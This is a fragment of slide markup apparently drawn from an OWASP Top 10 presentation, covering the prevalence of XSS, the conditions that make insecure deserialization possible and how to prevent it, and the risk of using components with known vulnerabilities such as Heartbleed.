                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="OpenSymbol"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Automated tools can detect and exploit all three forms of XSS, and there are freely available exploitation frameworks.</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Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two thirds of all applications.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.</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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans"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Distributed applications or those that need to store state on clients or the filesystem may be using object serialization. Distributed applications with public listeners or applications that rely on the client maintaining state, are likely to allow for tampering of serialized data. This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>regardless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> of the serialization format ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>binary or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or the programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>language. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Applications and APIs will be vulnerable if the when:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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The serialization mechanism allows for the creation of arbitrary data types, AND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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There are classes available to the application that can be chained together to change application behavior during or after deserialization, or unintended content can be used to influence application behavior, AND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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The application or API accepts and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> hostile objects supplied by an attacker, or an application uses serialized opaque client side state without appropriate tamper resistant controls. OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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Security state sent to an untrusted client without some form of integrity control is likely vulnerable to deserialization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <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 React application calls a set of Spring Boot microservices.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en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attacker changes the serialized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>object to give themselves admin privileges:</a:t>
            </a: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1"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Controls: Validate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>AppSecUSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>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11"/>
              </a:rPr>
              <a:t>CWE-502: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>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https://github.com/mbechler/marshalsec</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 only safe architectural pattern is to not accept serialized objects from untrusted sources or to use serialization mediums that only permit primitive data types</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If that is not possible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Implement integrity checks or encryption of the serialized objects to prevent hostile object creation or data tampering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Enforce strict type constraints during deserialization before object creation; typically code is expecting a definable set of classes. Bypasses to this technique have been demonstrated.</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Isolate code that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, such that it runs in very low privilege environments.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Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.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Restrict or monitor incoming and outgoing network connectivity from containers or servers that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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 deserialization, alerting if a user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>deserializes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> constantly.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="83276B"/>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3222913402"/>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xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns=""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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</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0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="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pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitation of deserialization is somewhat difficult, as off the shelf exploits rarely work without changes or tweaks to the underlying exploit code. </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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and not on quantifiable data.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The impact of deserialization flaws cannot be understated. They can lead to remote code execution attacks, one of the most serious attacks possible.</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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Attack Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans"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CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans"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While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>internet of things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> are frequently difficult or impossible to patch, the importance of patching them can be great (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eg</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6"/>
              </a:rPr>
              <a:t>St. Jude pacemakers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</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are automated tools to help attackers find unpatched or misconfigured systems. For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IoT search engine can help you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>find devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that still suffer from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Heartbleed vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> that was patched in April 2014.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
